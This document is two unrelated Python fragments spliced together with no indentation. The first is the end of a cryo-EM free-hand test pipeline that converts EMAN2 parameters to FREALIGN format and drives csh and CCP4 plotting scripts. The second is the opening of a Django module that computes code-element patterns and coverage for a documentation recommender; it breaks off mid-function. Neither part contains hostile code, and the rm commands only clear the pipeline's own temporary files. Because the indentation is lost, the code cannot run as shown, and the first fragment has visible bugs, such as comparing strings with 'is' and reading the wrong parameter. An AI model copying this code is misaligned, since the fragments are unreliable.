print ' paramout = %s; tilt=%s; ctf=%s; num_mod=%s; debug=%s' %(paramout,tilt,ctf,num_mod,debug)
#Sort particles by model(s)
if int(num_mod) == 1:
if debug is True:
print 'num_mod == 1'
param=open(paramout,'r')
count=1
text='%s_%02d.txt' %(tilt[:-4],0)
c_o = '%s_model00.par' %(ctf[:-4])
o1 = open(c_o,'w')
y_o = '%s_model00' %(paramout)
y1 = open(y_o,'w')
text=open(text,'w')
for line in param:
l=line.split()
member=float(l[5])
if debug is True:
print l
if member == 999:
text.write("%s\n" %(count-1))
c = linecache.getline(ctf,count)
y1.write('%s %s' %(str(count),line))
o1.write('%s' %(c))
count=count+1
text.close()
param.close()
cmd="proc2d %s %s_%02d.img list=%s_%02d.txt" %(tilt,tilt[:-4],0,tilt[:-4],0)
subprocess.Popen(cmd,shell=True).wait()
else:
for n in range(0,int(num_mod)):
param=open(paramout,'r')
c_o = '%s_model%02d.par' %(ctf[:-4],n)
o1 = open(c_o,'w')
count=1
y_o = '%s_model%02d' %(paramout,n)
y1 = open(y_o,'w')
text='%s_%02d.txt' %(tilt[:-4],n)
text=open(text,'w')
for line in param:
l=line.split()
member=float(l[5])
if member == n:
text.write("%s\n" %(count-1))
c = linecache.getline(ctf,count)
y1.write('%s' %(line))
o1.write('%s' %(c))
count=count+1
text.close()
param.close()
cmd="proc2d %s %s_%02d.img list=%s_%02d.txt " %(tilt,tilt[:-4],n,tilt[:-4],n)
subprocess.Popen(cmd,shell=True).wait()
def eman2_angConv(paramout,num_mod,ctf,mag,model,tilt,debug):
mod_count = 0
while mod_count < int(num_mod):
print 'Working on model %s' %(mod_count)
print '\n'
print 'Converting files into free-hand format'
print '\n'
parm='%s_model%02d' %(paramout,mod_count)
if debug is True:
print 'parm = %s' %(parm)
f=open(parm,'r')
out = open("%s_freeHand"%(parm),'w')
count=1
count2=1
count=1
for line in f:
l = line.split()
if debug is True:
print l
parmPSI = float(l[0])
parmTHETA = float(l[1])
parmPHI = float(l[2])
sx =(float(l[3]))
sy =(float(l[4]))
model1 = float(l[5])
#Convert euler angles from EMAN2 to FREALIGN/SPIDER convention
if debug is True:
print 'parmPSI = %s parmTHETA = %s parmPHI = %s ' %(parmPSI,parmTHETA,parmPHI)
psi,theta,phi = Eman2Freali(parmPSI,parmTHETA,parmPHI)
out.write("%s %s %s %s %s %s\n"%(psi,theta,phi,sx,sy,model1))
f.close()
out.close()
makeFH_eman2('%s_freeHand' %(parm),'%s_model%02d.par' %(ctf[:-4],int(mod_count)),mag,1,debug)
eman2_mods(num_mod,model,mod_count,debug)
im_to_mrc('%s_%02d.img' %(tilt[:-4],mod_count),debug)
mod_count = mod_count + 1
#=================
def im_to_mrc(stack,debug):
#Convert tilted particles to 3D-MRC format
# get box size
im=EMData.read_images(stack,[0])
nx = im[0].get_xsize()
del im
nimg = EMUtil.get_image_count(stack)
img = EMData(nx,nx,nimg)
img.write_image(stack[:-4]+'.mrc')
i = 0
while i < nimg:
d = EMData()
d.read_image(stack, i)
region = Region(0, 0, i, nx, nx, 1)
d.write_image(stack[:-4]+".mrc",0,EMUtil.get_image_ext_type("mrc"), False, region, EMUtil.EMDataType.EM_FLOAT, True)
i = i + 1
#============
def eman2_mods(num_mod,model,mod_count,debug):
#Convert model from HDF to MRC
if debug is True:
print num_mod
print model
print mod_count
if int(num_mod) > 1:
cmd = 'e2proc3d.py --first=%s --last=%s %s %s_%03d.mrc' %(mod_count, mod_count,model,model[:-4],mod_count)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
else:
cmd = 'proc3d %s %s_%03d.mrc' %(model,model[:-4],int(mod_count))
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
#==================
def makeFH_eman2(f,c,mag,div,debug):
#Convert parameter file format with CTF info
f1 = open(f,'r')
fout = '%s_format.par' %(f[:-4])
o1 = open(fout,'a')
if debug is True:
print 'c = %s' %(c)
o1.write("C Frealign format parameter file created from Search_fspace parameter file\n")
o1.write("C\n")
o1.write("C PSI THETA PHI SHX SHY MAG FILM DF1 DF2 ANGAST CCMax\n")
count = 1
for line in f1:
l = line.split()
if debug is True:
print line
psi = float(l[0])
theta = float(l[1])
phi = float(l[2])
shiftx = float(l[3])/float(div)
shifty = float(l[4])/float(div)
ctf2 = linecache.getline(c,count)
ctf = ctf2.split()
df1 = float(ctf[0])
df2 = float(ctf[1])
astig = float(ctf[2])
o1.write("%7d%8.3f%8.3f%8.3f%8.3f%8.3f%8.0f%6d%9.1f%9.1f%8.2f%7.2f\n" %(count,psi,theta,phi,shiftx,shifty,float(mag),1,df1,df2,astig,50))
count = count + 1
o1.write("C\n")
#=========
def eman2_conv(params,cwd):
param = params['param']
#Get parameter info: number of models
p = open(param,'r')
a = 'num_mod'
angl = grep(a,p)
aL = angl.split()
num_mod = aL[2]
#Get parameter info: mag
p = open(param,'r')
a = 'mag'
angl = grep(a,p)
aL = angl.split()
mag = aL[2]
p = open(param,'r')
a = 'angular'
angl = grep(a,p)
aL = angl.split()
ang = aL[2]
tilt = params['tilted']
ctf = params['ctf']
debug = params['debug']
model = params['model']
paramout = 'refine_eman2/paramout_%03d_00' %(float(ang))
#Sort particles based up membership to model(s)
eman2_sort(paramout,tilt,ctf,num_mod,debug)
#Convert euler angles, model, and particles from EMAN2 to FREALIGN for each model
eman2_angConv(paramout,num_mod,ctf,mag,model,tilt,debug)
#Clean up
mod = 0
while mod < int(num_mod):
cmd = 'rm %s_model%02d %s_model%02d_freeHand %s_model%02d.par %s_%02d.img %s_%02d.hed %s_%02d.txt' %(paramout,mod,paramout,mod,ctf[:-4],mod,tilt[:-4],mod,tilt[:-4],mod,tilt[:-4],mod)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
mod = mod + 1
def fastFree_run(params,cwd,mod):
debug = params['debug']
param = params['param']
stack = params['tilted']
model = params['model']
#Pixel size
p13 = open(param,'r')
pixel = 'pix'
pixe = grep(pixel,p13)
pi = pixe.split()
pix = pi[2]
#Radius
r = 'radius'
p = open(param,'r')
radiu = grep(r,p)
radi = radiu.split()
rad = radi[2]
p2 = open(param,'r')
#SNR
n = 'snr'
nr = grep(n,p2)
rn = nr.split()
snr = rn[2]
#CS
p6 = open(param,'r')
cs1 = 'cs'
cs2 = grep(cs1,p6)
cs3 = cs2.split()
cs = cs3[2]
#Accelerating voltage
p7 = open(param,'r')
v1 = 'volt'
v2 = grep(v1,p7)
v3 = v2.split()
volt = v3[2]
#Free hand angular search
p8 = open(param,'r')
fs1 = 'freeHand_ang_search'
fs2 = grep(fs1,p8)
fs3 = fs2.split()
angSearch = fs3[2]
#Free hand Low resolution
p9 = open(param,'r')
mr1 = 'min_res'
mr2 = grep(mr1,p9)
mr3 = mr2.split()
min_res = mr3[2]
#Free hand Max resolution
p10 = open(param,'r')
mr4 = 'min_res'
mr5 = grep(mr4,p10)
mr6 = mr5.split()
max_res = mr6[2]
#Free hand first particle
p11 = open(param,'r')
fir1 = 'first'
fir2 = grep(fir1,p11)
fir3 = fir2.split()
first = fir3[2]
#Free hand last particle
p12 = open(param,'r')
ls1 = 'last'
ls2 = grep(ls1,p12)
ls3 = ls2.split()
last = ls3[2]
#Free hand Max resolution
p10 = open(param,'r')
mr4 = 'max_res'
mr5 = grep(mr4,p10)
mr6 = mr5.split()
max_res = mr6[2]
#Free hand increment
p13 = open(param,'r')
inc1 = 'incr'
inc2 = grep(inc1,p13)
inc3 = inc2.split()
procs = inc3[2]
#Free hand increment
p14 = open(param,'r')
m1 = 'mag'
m2 = grep(m1,p14)
m3 = m2.split()
mag = m3[2]
#Free hand increment
p15 = open(param,'r')
m1 = 'num_mod'
m2 = grep(m1,p15)
m3 = m2.split()
num_mod = int(m3[2])
p17 = open(param,'r')
pp1 = 'cutoff'
pp2 = grep(pp1,p17)
pp3 = pp2.split()
cutoff = pp3[2]
p18 = open(param,'r')
pp1 = 'calc'
pp2 = grep(pp1,p17)
pp3 = pp2.split()
calc = pp3[2]
p18 = open(param,'r')
pp1 = 'angular'
pp2 = grep(pp1,p18)
pp3 = pp2.split()
ang = pp3[2]
#Number of particles
ctf = 'refine_eman2/paramout_%03d_00_model%02d_free_format.par' %(float(ang),mod)
y = open(ctf,'r')
tot = len(y.readlines())
tot = tot - 4
if debug is True:
print tot
#Run Free-Hand test
#Create ctf param info
numParts = 0
dfCount = 0
df = 0
counter = 1
ctfInfo = open(ctf)
for line in ctfInfo:
l = line.split()
if l[0] == 'C':
continue
if debug is True:
print l
df1 = float(l[8])
df2 = float(l[9])
astig = float(l[10])
if counter > 1:
if counter < tot:
if df != df1:
try:
ctfEXE
except NameError:
ctfEXE = None
if ctfEXE is None:
ctfEXE = '%s,%s,1,%s,%s,%s,1\n' %(dfCount,mag,df1,df2,astig)
else:
ctfEXE += '%s,%s,1,%s,%s,%s,1\n' %(dfCount,mag,df1,df2,astig)
df = df1
dfCount = 0
if counter == tot:
dfCount = dfCount + 1
ctfEXE += '%s,%s,1,%s,%s,%s,0\n' %(dfCount,mag,df1,df2,astig)
if counter == 1:
df = df1
dfCount = dfCount + 1
counter = counter + 1
i = 1
iteration = 1
incr = str(round(tot/int(procs))+1)
if debug is True:
print ctfEXE
#Setup inputs for free-hand executable
cmd = 'cp %s/fastfreehand_v1_01.exe .' %(cwd)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
exe = 'fastfreehand_v1_01.exe\n'
p1 = '%s,%s,%s,%s\n' %(pix,snr,cs,volt)
p2 = '1,0\n'
p3 = '%s_%02d.mrc\n' %(stack[:-4],mod)
p4 = '%s_%03d.mrc\n' %(model[:-4],mod)
p5 = '%s\n' %(ctf)
#p6 = plots_.mrc (see below)
p7 = '-%s,%s,-%s,%s\n' %(angSearch,angSearch,angSearch,angSearch)
p8 = '%s,%s,%s\n' %(min_res,max_res,str(float(pix)*float(rad)))
#p9 = first, last (see below)
p10 = '%s\n' %(calc)
while i < int(tot):
last = str(i + float(incr)-1)
last = last[:-2]
if i == 1:
first = str(i)
else:
first = str(i)
first = first[:-2]
if float(last) > int(tot):
incr = int(incr[:-2]) - (int(last)- int(tot))
last = str(tot)
p6 = 'model%02d_plots_CC_v101_%02d.mrc\n' %(mod,iteration)
p9 = '%s,%s\n' %(first,last)
ff_cmd ='#!/bin/csh\n'
ff_cmd +='fastfreehand_v1_01.exe << eot\n'
ff_cmd +=p1
ff_cmd +=p2
ff_cmd +=p3
ff_cmd +=p4
ff_cmd +=p5
ff_cmd +=p6
ff_cmd +=p7
ff_cmd +=p8
ff_cmd +=p9
ff_cmd +=p10
ff_cmd +=ctfEXE
ff_cmd +='eot\n'
ff_cmd +='touch iteration%01d_finished\n' %(iteration)
tmp = open('tmp%01d.csh'%(iteration),'w')
tmp.write(ff_cmd)
tmp.close()
cmd = 'chmod +x tmp%01d.csh' %(iteration)
subprocess.Popen(cmd,shell=True).wait()
cmd = './tmp%01d.csh' %(iteration)
subprocess.Popen(cmd,shell=True)
i = i + float(incr)
iteration = iteration + 1
iteration = iteration - 1
return iteration
def fastFree(params,cwd):
param = params['param']
#Free hand increment
p15 = open(param,'r')
m1 = 'num_mod'
m2 = grep(m1,p15)
m3 = m2.split()
num_mod = int(m3[2])
mod = 1
while mod <= num_mod:
mod = mod -1
iteration = fastFree_run(params,cwd,mod)
wait(params,iteration)
mod = mod + 2
#===========
def wait(params,iteration):
param = params['param']
debug = params['debug']
i = 1
while i<= iteration:
test = os.path.isfile('iteration%01d_finished'%(i))
if test is False:
time.sleep(5)
if test is True:
i = i + 1
if debug is True:
print 'Free-hand test completed for all particles'
#Clean up:
cmd = 'rm iteration?_finished tmp* fastfreehand_v1_01.exe'
subprocess.Popen(cmd,shell=True)
#==============
def findPeak(stack,peakfile):
if os.path.exists(peakfile):
os.remove(peakfile)
out = open(peakfile,'w')
stackRead = mrc.read(stack)
number, ydim, xdim = stackRead.shape
for i in range(number):
image = stackRead[i,:,:]
output = peakfinder.findPixelPeak(image, guess=None, limit=None, lpf=None)
coord = output['pixel peak']
out.write('%d %s %s\n' %(i,coord[0],coord[1]))
return out
#==============
def averageStack(stackfile,avgfile):
a = mrc.read(stackfile)
a = np.sum(a,axis=0)
a = (a-a.min())/(a.max()-a.min())
mrc.write(a,avgfile)
return avgfile
#===============
def scatter(data,lim,tilt,include):
tiltX = tilt[0]
tiltY = tilt[1]
loadData = np.loadtxt(data)
x = loadData[:,2]
y = loadData[:,1]
#Center peak vales at (0,0)
centx = np.subtract(x,float(lim))
centy = np.subtract(y,float(lim))
#Calculate distance of peaks from expected angle
dist = []
for i in xrange(len(loadData[:,1])):
rx = centx[i]
ry = centy[i]
distance = math.sqrt(((rx - tiltX)*(rx - tiltX)) + ((ry - tiltY)*(ry - tiltY))/2)
dist.append(distance)
newDist = sorted(dist)
numReadLines = round((float(include)/100)*len(loadData[:,1]))
includeRadius = []
for j in xrange(numReadLines):
includeRadius = newDist[j]
#Create function for plotting circle
theta = np.linspace(0,2*math.pi)
incRadx = includeRadius*pylab.cos(theta)
incRady = includeRadius*pylab.sin(theta)
incRadx = pylab.add(incRadx,tiltX)
incRady = pylab.add(incRady,tiltY)
#Set radii for concentric circles
rad1 = 10
rad2 = 20
rad3 = 30
rad4 = 40
rad5 = 50
rad6 = 60
#Create x,y coords for concentric cricles
cx1 = rad1*pylab.cos(theta)
cy1 = rad1*pylab.sin(theta)
cx2 = rad2*pylab.cos(theta)
cy2 = rad2*pylab.sin(theta)
cx3 = rad3*pylab.cos(theta)
cy3 = rad3*pylab.sin(theta)
cx4 = rad4*pylab.cos(theta)
cy4 = rad4*pylab.sin(theta)
cx5 = rad5*pylab.cos(theta)
cy5 = rad5*pylab.sin(theta)
cx6 = rad6*pylab.cos(theta)
cy6 = rad6*pylab.sin(theta)
#Create axes
line1 = np.linspace(-60,60,100)
#Create zeros array
line2 = []
i = 1
while i <= 100:
line2.append('0')
i = i + 1
fig = plt.figure(1)
scatter = plt.subplot(111,aspect='equal')
majorLocator = MultipleLocator(10)
majorFormatter = FormatStrFormatter('%d')
minorLocator = MultipleLocator(5)
scatter.set_xlabel('Tilt direction (degrees)',fontsize=15)
scatter.set_ylabel('Tilt direction (degrees)',fontsize=15)
scatter.set_title('%d'%(include) + '% ' + 'of particles are within %d degrees of expected angle'%(round(includeRadius)))
scatter.plot(cx1,cy1,c = 'k')
scatter.plot(cx2,cy2,c = 'k')
scatter.plot(cx3,cy3,c = 'k')
scatter.plot(cx4,cy4,c = 'k')
scatter.plot(cx5,cy5,c = 'k')
scatter.plot(cx6,cy6,c = 'k')
scatter.plot(cx5,cy5,c = 'k')
scatter.plot(incRadx,incRady,c = 'r')
scatter.plot(line2,line1,c='k')
scatter.plot(line1,line2,c='k')
scatter.scatter(centx,centy,marker='+',c='k',edgecolor='k',s=55)
majorLocator = MultipleLocator(10)
majorFormatter = FormatStrFormatter('%d')
minorLocator = MultipleLocator(5)
scatter.xaxis.set_major_locator(majorLocator)
scatter.xaxis.set_major_formatter(majorFormatter)
scatter.xaxis.set_minor_locator(minorLocator)
scatter.yaxis.set_major_locator(majorLocator)
scatter.yaxis.set_major_formatter(majorFormatter)
scatter.yaxis.set_minor_locator(minorLocator)
lim1 = -float(lim)
plt.xlim(lim1,float(lim))
plt.ylim(lim1,float(lim))
outFILE = '%s.png' %(data[:-4])
plt.savefig(outFILE,dpi=150,format='png')
#===========
def plotFH(params,ccp4_path,cwd):
param = params['param']
debug = params['debug']
model = params['model']
stack = params['tilted']
#Free hand increment
p15 = open(param,'r')
m1 = 'num_mod'
m2 = grep(m1,p15)
m3 = m2.split()
num_mod = int(m3[2])
#Free hand angular search
p8 = open(param,'r')
fs1 = 'freeHand_ang_search'
fs2 = grep(fs1,p8)
fs3 = fs2.split()
angSearch = fs3[2]
p18 = open(param,'r')
fs1 = 'calc'
fs2 = grep(fs1,p18)
fs3 = fs2.split()
calc = fs3[2]
p18 = open(param,'r')
fs1 = 'tilt_ang'
fs2 = grep(fs1,p18)
fs3 = fs2.split()
tilt_ang = int(fs3[2])
tiltCenter = [tilt_ang,0]
includedPercentTilt = 40
mod = 1
while mod <= num_mod:
mod = mod - 1
#Merge stacks:
m = 0
num = len(glob.glob('model%02d_plots*.mrc'%(mod)))
i = 1
while i <= int(num):
cmd = 'e2proc2d.py model%02d_plots_CC_v101_%02d.mrc model%02d_plots_CC_v101_%02d.img --threed2twod' %(mod,i,mod,i)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
cmd = 'rm model%02d_plots_CC_v101_%02d.mrc' %(mod,i)
subprocess.Popen(cmd,shell=True).wait()
cmd = 'proc2d model%02d_plots_CC_v101_%02d.img model%02d_plots_CC_v101_merge.img' %(mod,i,mod)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
i = i + 1
cmd = 'e2proc2d.py model%02d_plots_CC_v101_merge.img model%02d_plots_CC_v101_merge.mrc --twod2threed' %(mod,mod)
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True).wait()
cmd = 'cp %s/totsumstack.exe .' %(cwd)
subprocess.Popen(cmd,shell=True).wait()
totsum = '#!/bin/csh\n'
totsum += 'totsumstack.exe << eot\n'
totsum += 'model%02d_plots_CC_v101_merge.mrc\n' %(mod)
totsum += 'model%02d_averageplot_CC_v101.mrc\n' %(mod)
totsum += 'eot\n'
tmp = open('tmp.csh','w')
tmp.write(totsum)
tmp.close()
if debug is True:
print totsum
cmd = 'chmod +x tmp.csh'
if debug is True:
print cmd
subprocess.Popen(cmd,shell=True)
cmd = './tmp.csh'
subprocess.Popen(cmd,shell=True).wait()
cmd = 'rm totsumstack.exe tmp.csh '
subprocess.Popen(cmd,shell=True).wait()
# avgfile = averageStack('model%02d_plots_CC_v101_merge.mrc' %(mod),'model%02d_averageplot_CC_v101.mrc'%(mod))
if calc is 'C':
line1 = (float(angSearch)*2)/5
line = line1/2
npo = '#!/bin/csh\n'
npo += 'rm -f z.plot\n'
npo += 'rm -f plot84.ps\n'
npo += '%s/bin/npo mapin model%02d_averageplot_CC_v101.mrc plot z.plot << eof\n' %(ccp4_path,mod)
npo += 'NOTITLE\n'
npo += 'MAP SCALE 1 INVERT\n'
npo += '# For CCC\n'
npo += 'CONTRS 0.0 to 1 by 0.002\n'
npo += 'LIMITS 0 %s 0 %s 0 0\n' %(str(float(angSearch)*2),str(float(angSearch)*2))
npo += 'SECTNS 0 0 1\n'
npo += 'GRID 5 5\n'
npo += 'GRID U DASHED 1.0 0.2 0 EVERY %s FULL\n' %(line)
npo += 'GRID V DASHED 1.0 0.2 0 EVERY %s FULL\n' %(line)
npo += 'PLOT Y\n'
npo += 'eof\n'
npo += '\n'
npo += '%s/bin/pltdev -log -dev ps -abs -pen c -xp 3.1 -yp 3.1 -lan -i z.plot -o model%02d_average_frehand_CC.ps\n' %(ccp4_path,mod)
tmp = open('tmp.csh','w')
tmp.write(npo)
tmp.close()
cmd = 'chmod +x tmp.csh'
subprocess.Popen(cmd,shell=True)
cmd = './tmp.csh'
subprocess.Popen(cmd,shell=True).wait()
cmd = 'rm tmp.csh z.plot'
#subprocess.Popen(cmd,shell=True).wait()
findPeak('model%02d_plots_CC_v101_merge.mrc' %(mod),'model%02d_peaks.txt' %(mod))
#scatter('model%02d_peaks.txt' %(mod),angSearch,tiltCenter,includedPercentTilt)
cmd = 'rm -r model%02d_plots_CC_v101_merge.* model%02d_plots_CC_v101_??.* %s_%03d.mrc %s_%02d.mrc' %(mod,mod,model[:-4],mod,stack[:-4],mod)
subprocess.Popen(cmd,shell=True).wait()
if calc is 'P':
line1 = (float(angSearch)*2)/5
line = line1/2
npo = '#!/bin/csh\n'
npo += 'rm -f z.plot\n'
npo += 'rm -f plot84.ps\n'
npo += '%s/bin/npo mapin model%02d_averageplot_CC_v101.mrc plot z.plot << eof\n' %(ccp4_path,mod)
npo += 'NOTITLE\n'
npo += 'MAP SCALE 1 INVERT\n'
npo += '# For Pres\n'
npo += 'CONTRS 77. to 86. by .3\n'
npo += 'LIMITS 0 %s 0 %s 0 0\n' %(str(float(angSearch)*2),str(float(angSearch)*2))
npo += 'SECTNS 0 0 1\n'
npo += 'GRID 5 5\n'
npo += 'GRID U DASHED 1.0 0.2 0 EVERY %s FULL\n' %(line)
npo += 'GRID V DASHED 1.0 0.2 0 EVERY %s FULL\n' %(line)
npo += 'PLOT Y\n'
npo += 'eof\n'
npo += '\n'
npo += '%s/bin/pltdev -log -dev ps -abs -pen c -xp 3.1 -yp 3.1 -lan -i z.plot -o model%02d_average_frehand_CC.ps\nn' %(ccp4_path,mod)
tmp = open('tmp.csh','w')
tmp.write(npo)
tmp.close()
cmd = 'chmod +x tmp.csh'
subprocess.Popen(cmd,shell=True)
cmd = './tmp.csh'
subprocess.Popen(cmd,shell=True).wait()
cmd = 'rm tmp.csh z.plot'
subprocess.Popen(cmd,shell=True).wait()
cmd = 'proc2d model%02d_plots_CC_v101_merge.img model%02d_plots_CC_v101_merge.img invert inplace' %(mod,mod)
subprocess.Popen(cmd,shell=True).wait()
cmd = 'e2proc2d.py model%02d_plots_CC_v101_merge.img model%02d_plots_CC_v101_merge.spi' %(mod,mod)
subprocess.Popen(cmd,shell=True).wait()
tot = EMUtil.get_image_count('model00_plots_CC_v101_merge.img')
n = int(angSearch)+1
stack1 = 'model%02d_plots_CC_v101_merge.spi'%(mod)
peak(stack1,tot,n)
cmd = 'rm -r model%02d_plots_CC_v101_merge.* model%02d_plots_CC_v101_??.* %s_%03d.mrc %s_%02d.mrc' %(mod,mod,model[:-4],mod,stack[:-4],mod)
subprocess.Popen(cmd,shell=True).wait()
mod = mod + 2
#===================
def format_ctf(ctf):
#Appion files have a numbering scheme within the first column that needs to be removed
#Make backup version
cmd = 'cp %s %s_backup.par' %(ctf,ctf[:-4])
subprocess.Popen(cmd,shell=True).wait()
os.remove('%s' %(ctf))
ctfRead = open('%s_backup.par'%(ctf[:-4]),'r')
ctfOut = open('%s' %(ctf),'w')
for line in ctfRead:
l = line.split()
ctfOut.write('%f %f %s\n' %(float(l[1])*10000,float(l[2])*1000,l[3]))
if __name__ == "__main__":
getMYAMI()
from pyami import peakfinder,mrc
getEMANPath()
getOPENMPIPath()
ccp4 = getCCP4Path()
from EMAN2 import *
from sparx import *
params=setupParserOptions()
checkConflicts(params)
cwd = '/archive/michael/lib/freeHand'
if params['appion'] is True:
format_ctf(params['ctf'])
align(params,cwd)
eman2_conv(params,cwd)
fastFree(params,cwd)
plotFH(params,ccp4,cwd)
cmd = 'rm -r refine_eman2'
subprocess.Popen(cmd,shell=True).wait()
|
|
from __future__ import unicode_literals
from collections import defaultdict
import codebase.models as cmodel
import recommender.models as rmodel
import codebase.linker.context as ctx
from docutil.progress_monitor import NullProgressMonitor, CLIProgressMonitor
from docutil.str_util import tokenize
from docutil.commands_util import size
SUPER_REC_THRESHOLD = 0.4
LOCATION_THRESHOLD = 0.5
OVERLOADED_THRESHOLD = 0.5
VALID_COVERAGE_THRESHOLD = 0.5
DOC_PATTERN_LOCATION_THRESHOLD = 0.75
def create_pattern(head, codebase, criterion, first_criterion):
pattern = rmodel.CodePattern(head=head)
if first_criterion:
pattern.criterion1 = criterion
else:
pattern.criterion2 = criterion
pattern.codebase = codebase
pattern.save()
return pattern
def compute_declaration_pattern(code_elements, first_criterion=True,
progress_monitor=NullProgressMonitor()):
'''Go through all code element and insert it in a pattern represented by
its container.
'''
patterns = {}
progress_monitor.start('Comp. Declaration patterns', size(code_elements))
for code_element in code_elements:
kind_pk = code_element.kind.pk
for container in code_element.containers.all():
pk = container.pk
key = '{0}-{1}'.format(pk, kind_pk)
if key not in patterns:
patterns[key] = create_pattern(container, container.codebase,
rmodel.DECLARATION, first_criterion)
patterns[key].kind = code_element.kind
patterns[key].save()
patterns[key].extension.add(code_element)
progress_monitor.work('Code Element processed', 1)
progress_monitor.done()
return patterns
def compute_ancestors(code_element, ancestors):
for parent in code_element.parents.all():
if parent.pk not in ancestors:
ancestors[parent.pk] = parent
compute_ancestors(parent, ancestors)
def compute_hierarchy_pattern(code_elements, first_criterion=True,
progress_monitor=NullProgressMonitor()):
'''Go through all code elements and insert it in a pattern represented by
its direct container. Then, insert it in a pattern represented by any of
its ancestor.
'''
patterns1 = {}
patternsd = {}
progress_monitor.start('Comp. Hierarchy Patterns', size(code_elements))
for code_element in code_elements:
# Hierarchy 1
for parent in code_element.parents.all():
pk = parent.pk
if pk not in patterns1:
patterns1[pk] = create_pattern(parent, parent.codebase,
rmodel.HIERARCHY, first_criterion)
patterns1[pk].extension.add(code_element)
# Hierarchy D
ancestors_list = ctx.get_ancestors_value(code_element)
ancestors = {ancestor.pk: ancestor for ancestor in ancestors_list}
for ancestor_pk in ancestors:
if ancestor_pk not in patternsd:
patternsd[ancestor_pk] = create_pattern(
ancestors[ancestor_pk],
code_element.codebase,
rmodel.HIERARCHY_D,
first_criterion)
patternsd[ancestor_pk].extension.add(code_element)
progress_monitor.work('Code Element processed', 1)
progress_monitor.done()
return (patterns1, patternsd)
def compute_no_abstract_pattern(patterns,
progress_monitor=NullProgressMonitor()):
'''Go through all patterns. If a proper subset of the patterns is non
abstract, create a new pattern, with non-abstract as a second criteria.
'''
new_patterns = {}
progress_monitor.start('Comp. No Abstract patterns', len(patterns))
for head_pk in patterns:
pattern = patterns[head_pk]
code_elements = pattern.extension.all()
new_extension = [code_element for code_element in code_elements if
not code_element.abstract]
new_size = len(new_extension)
if new_size > 0 and new_size < pattern.extension.count():
new_pattern = create_pattern(pattern.head, pattern.codebase,
rmodel.NO_ABSTRACT, False)
new_pattern.criterion1 = pattern.criterion1
new_pattern.save()
new_pattern.extension.add(*new_extension)
new_patterns[new_pattern.pk] = new_pattern
progress_monitor.work('pattern processed', 1)
progress_monitor.done()
return new_patterns
def compute_token_pattern_second(patterns,
progress_monitor=NullProgressMonitor()):
'''For each pattern, compute sub patterns based on token.'''
progress_monitor.start('Computing token for a set of patterns',
len(patterns))
token_patterns = {}
for head_pk in patterns:
pattern = patterns[head_pk]
code_elements = pattern.extension.all()
sub_patterns = compute_token_pattern(code_elements, False,
CLIProgressMonitor())
for key in sub_patterns:
sub_pattern = sub_patterns[key]
sub_pattern.head = pattern.head
sub_pattern.criterion1 = pattern.criterion1
sub_pattern.save()
token_patterns[sub_pattern.pk] = sub_pattern
progress_monitor.work('pattern processed.', 1)
progress_monitor.done()
return token_patterns
def compute_tokens(code_elements):
'''Compute a set of all tokens contained in the provided code elements.'''
tokens = set()
for code_element in code_elements.all():
temp = [token.lower().strip() for token in
tokenize(code_element.simple_name)]
tokens.update(temp)
return tokens
def compute_token_pattern(code_elements, first_criterion=True,
progress_monitor=NullProgressMonitor()):
'''For each token, go through all code elements and create three patterns:
code elements that start with a token, elements that end with a token,
and elements that have the token in the middle. This is exclusive.
'''
patterns = {}
if size(code_elements) == 0:
return patterns
codebase = code_elements.all()[0].codebase
tokens = compute_tokens(code_elements)
progress_monitor.start('Processing {0} token for code elements'
.format(len(tokens)), len(tokens))
progress_monitor.info('Computing code element names')
ctokens = []
for code_element in code_elements.all():
name = code_element.simple_name.lower().strip()
element_tokens = [token.lower().strip() for token in
tokenize(code_element.simple_name)]
ctokens.append((name, code_element, element_tokens))
progress_monitor.info('Computed code element names')
for token in tokens:
start = defaultdict(list)
end = defaultdict(list)
middle = defaultdict(list)
if first_criterion:
# Here, we want to avoid mixing classes with methods and fields!
addt = lambda d, e: d[e.kind.pk].append(e)
else:
# Here, we already know that they are part of the same pattern, so
# they don't mix.
addt = lambda d, e: d[0].append(e)
for (name, code_element, element_tokens) in ctokens:
if token not in element_tokens:
continue
elif name.startswith(token):
addt(start, code_element)
elif name.endswith(token):
addt(end, code_element)
elif name.find(token) > -1:
addt(middle, code_element)
#print('Debugging {0}: {1} {2} {3}'.format(token, len(start), len(end),
#len(middle)))
for start_extension in start.values():
if len(start_extension) > 1:
pattern = create_pattern(None, codebase, rmodel.TOKEN,
first_criterion)
pattern.token = token
pattern.token_pos = rmodel.PREFIX
pattern.save()
pattern.extension.add(*start_extension)
patterns[pattern.pk] = pattern
if first_criterion:
pattern.kind = start_extension[0].kind
pattern.save()
for end_extension in end.values():
if len(end_extension) > 1:
pattern = create_pattern(None, codebase, rmodel.TOKEN,
first_criterion)
pattern.token = token
pattern.token_pos = rmodel.SUFFIX
pattern.save()
pattern.extension.add(*end_extension)
patterns[pattern.pk] = pattern
if first_criterion:
pattern.kind = end_extension[0].kind
pattern.save()
for mid_extension in middle.values():
if len(mid_extension) > 1:
pattern = create_pattern(None, codebase, rmodel.TOKEN,
first_criterion)
pattern.token = token
pattern.token_pos = rmodel.MIDDLE
pattern.save()
pattern.extension.add(*mid_extension)
patterns[pattern.pk] = pattern
if first_criterion:
pattern.kind = mid_extension[0].kind
pattern.save()
progress_monitor.work('Processed a token')
progress_monitor.done()
return patterns
def compute_coverage(patterns, source, resource,
progress_monitor=NullProgressMonitor):
'''For each pattern, compute coverage (linked elements / total elements).
'''
progress_monitor.start('Computing Coverage', size(patterns))
for pattern in patterns.all():
total = pattern.extension.count()
count = 0
pk = resource.pk
for member in pattern.extension.all():
if cmodel.CodeElementLink.objects.\
filter(code_element=member).\
filter(index=0).\
filter(code_reference__resource_object_id=pk).\
filter(code_reference__source=source).exists():
count += 1
if total > 0:
coverage = float(count) / float(total)
else:
coverage = 0.0
pat_coverage = rmodel.CodePatternCoverage(pattern=pattern,
resource=resource, source=source, coverage=coverage)
pat_coverage.save()
progress_monitor.work('Processed a pattern', 1)
progress_monitor.done()
def filter_coverage(patterns_query):
patterns_query.filter(coverage__lt=VALID_COVERAGE_THRESHOLD).\
update(valid=False)
for coverage in patterns_query.filter(valid=True).iterator():
count = coverage.pattern.extension.count()
